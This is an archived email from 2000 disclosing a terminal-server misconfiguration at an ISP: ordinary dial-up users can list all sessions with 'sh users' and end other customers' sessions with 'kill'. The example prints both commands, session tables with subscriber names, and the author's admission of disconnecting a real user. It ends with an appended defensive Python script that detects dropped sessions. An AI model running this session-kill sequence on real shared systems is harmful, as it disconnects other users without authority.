I thought you may be interested in reading.
Date: 10/07/00
Subject: Terminal Server Router, Misconfiguration
Author: Jay Daniels <[EMAIL PROTECTED]>
INTRODUCTION
This is something I found out of pure curiosity. Cisco routers and
terminal servers alike that don't automatically start ppp when you
log in allow users to kill other users' processes. In essence, if you
get a prompt when you log in with minicom then you are vulnerable to
attack. Thus, one can kick anyone offline at will! A malicious user could
easily write a script and run it to kill certain users or all users
except himself, of course.
EXPLANATION
While having trouble signing on recently when tech support changed my
login id, I used minicom (but any dialup terminal program will do) to
connect and see if my account was activated. I had done this many
times before when I just needed to telnet in and check my email,
etc. I decided to learn more about the terminal server commands.
After seeing the kill command, I assumed I could only kill my active
telnet connection.
However, I was surprised to learn that I could kill anyone's process!
Thinking that I would get an error instead, I killed a user ;( I hope
he dialed back in and didn't notice. Then I killed myself (not
really;), my modem died.
I'm not a cisco/router expert, but there should be a way to stop users
from using deadly commands, like kill! Also, since the EXEC users
allows one to retrieve the process id of current users, this should
also be restricted.
EXAMPLE
dialup to terminal
username: jay
password: ************
PROMT>sh users #sh is short for show
I Session Line: Slot: Tx Rx Service Host User
O ID Chan Port Data Rate Type[mpID] Address Name
I 273782311 2:14 3:11 42667 24000 PPP 209.229.99.184 nononz
I 273782362 2:7 3:6 46667 24000 PPP 209.229.99.171 ddeane2
I 273782361 2:15 4:1 48000 21600 PPP 209.229.99.170 morrishill
I 273782378 1:12 4:14 45333 26400 PPP 209.229.99.188 nyx1
I 273782375 1:6 4:13 49333 24000 PPP 209.229.99.185 tonnie
I 273782368 2:3 5:4 44000 16800 PPP 209.229.99.177 allenh
I 273782364 1:18 3:5 37333 24000 PPP 209.229.99.173 gmcdaniel
I 273782365 1:13 4:3 46667 21600 PPP 209.229.99.174 joe
I 273782345 1:17 4:12 45333 16800 PPP 209.229.99.154 jmoore537
I 273782366 2:1 3:13 40000 24000 PPP 209.229.99.175 freddurden
I 273782343 1:1 5:2 48000 26400 PPP 209.229.99.152 donmoore
I 273782349 1:22 4:15 34667 14400 PPP 209.229.99.158 dinky100
I 273782367 2:21 5:9 49333 26400 PPP 209.229.99.176 drewmcd
I 273782380 1:16 4:9 28800 28800 PPP 209.229.99.190 amjam
I 273782377 2:23 5:11 24000 19200 PPP 209.229.99.187 gadget
I 273782371 2:8 5:14 42667 19200 PPP 209.229.99.180 jbruno
I 273782379 2:12 3:10 28800 24000 PPP 209.229.99.189 lawhon
I 273782381 1:7 3:3 45333 26400 Termsrv N/A jay
PROMT>kill 273782365
Process killed... #or something like that.
PROMT>sh users #sh is short for show users to get process id.
I Session Line: Slot: Tx Rx Service Host User
O ID Chan Port Data Rate Type[mpID] Address Name
I 273782311 2:14 3:11 42667 24000 PPP 209.229.99.184 nononz
I 273782362 2:7 3:6 46667 24000 PPP 209.229.99.171 ddeane2
I 273782361 2:15 4:1 48000 21600 PPP 209.229.99.170 morrishill
I 273782378 1:12 4:14 45333 26400 PPP 209.229.99.188 nyx1
I 273782375 1:6 4:13 49333 24000 PPP 209.229.99.185 tonnie
I 273782368 2:3 5:4 44000 16800 PPP 209.229.99.177 allenh
I 273782364 1:18 3:5 37333 24000 PPP 209.229.99.173 gmcdaniel
I 273782345 1:17 4:12 45333 16800 PPP 209.229.99.154 jmoore537
I 273782366 2:1 3:13 40000 24000 PPP 209.229.99.175 freddurden
I 273782343 1:1 5:2 48000 26400 PPP 209.229.99.152 donmoore
I 273782349 1:22 4:15 34667 14400 PPP 209.229.99.158 dinky100
I 273782367 2:21 5:9 49333 26400 PPP 209.229.99.176 drewmcd
I 273782380 1:16 4:9 28800 28800 PPP 209.229.99.190 amjam
I 273782377 2:23 5:11 24000 19200 PPP 209.229.99.187 gadget
I 273782371 2:8 5:14 42667 19200 PPP 209.229.99.180 jbruno
I 273782379 2:12 3:10 28800 24000 PPP 209.229.99.189 lawhon
I 273782381 1:7 3:3 45333 26400 Termsrv N/A jay
* note: ip's have been changed
RESULTS
I killed *joe! He is no longer logged in. Ok, since I have no
business killing users' processes or getting killed, can you fix this
problem?
Before you do, consider the following...
I use infoave.net because it works great and I can login with
Windows3.1/95/98/NT and Linux. I hope we do not lose any functionality.
For this very reason I considered not sending you this document; but, with
further consideration I thought you should know. Try the above commands
yourself: dial up with a terminal and log in as a normal user.
I'm just a hippie stuck in the Seventies with nothing better to do,
but surf the web;)
Jay Daniels ----------------------------------
,_, mailto:[EMAIL PROTECTED]
(O,O) http://web.infoave.net/~jay
( ) 76B1 A850 6F40 2A25 0BE6 378E CDC9 6408
-"-"------------------------------------------
----
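For an administrator auditing a terminal server like the one described in this message, the following added example (not part of the original email) parses two `sh users` snapshots in the format shown above, including rows whose user name wrapped onto the next line, and reports which sessions vanished between snapshots and which accounts hold an interactive `Termsrv` prompt. The sample rows, addresses, user names and function names are constructed for illustration.

```python
import re

# One session row: status flag, session ID, line:chan, slot:port, Tx, Rx,
# service type, host address (or N/A) and an optional user name.
ROW = re.compile(
    r"^[IO]\s+(?P<sid>\d+)\s+\d+:\d+\s+\d+:\d+\s+\d+\s+\d+\s+"
    r"(?P<service>\S+)\s+(?P<host>\S+)(?:\s+(?P<user>\S+))?\s*$"
)

def parse_sessions(text):
    """Return {session_id: (service, host, user)} from `sh users` output."""
    sessions, pending = {}, None
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            sessions[m["sid"]] = (m["service"], m["host"], m["user"])
            # A row with no user name means the name wrapped to the next line.
            pending = m["sid"] if m["user"] is None else None
        elif pending and re.fullmatch(r"\S+", line.strip()):
            service, host, _ = sessions[pending]
            sessions[pending] = (service, host, line.strip())
            pending = None
        else:
            pending = None  # header or unrelated line
    return sessions

def dropped_sessions(before, after):
    """Sessions present in the first snapshot but missing from the second."""
    return [(sid, before[sid][2]) for sid in sorted(before.keys() - after.keys())]

def interactive_users(sessions):
    """Accounts sitting at a terminal-server prompt rather than in PPP."""
    return sorted(u for svc, _, u in sessions.values() if svc == "Termsrv" and u)

# Constructed sample snapshots (documentation addresses, made-up users).
BEFORE = """\
I Session Line: Slot: Tx Rx Service Host User
O ID Chan Port Data Rate Type[mpID] Address Name
I 1001 2:14 3:11 42667 24000 PPP 192.0.2.10 alice
I 1002 2:15 4:1 48000 21600 PPP 192.0.2.11
longusername
I 1003 1:13 4:3 46667 21600 PPP 192.0.2.12 bob
I 1004 1:7 3:3 45333 26400 Termsrv N/A carol
"""
AFTER = BEFORE.replace("I 1003 1:13 4:3 46667 21600 PPP 192.0.2.12 bob\n", "")

if __name__ == "__main__":
    before, after = parse_sessions(BEFORE), parse_sessions(AFTER)
    print("dropped:", dropped_sessions(before, after))
    print("at a prompt:", interactive_users(after))
```

A dropped session is only a lead, since an ordinary hang-up looks the same; the useful signal is a drop that coincides with another account sitting at a `Termsrv` prompt.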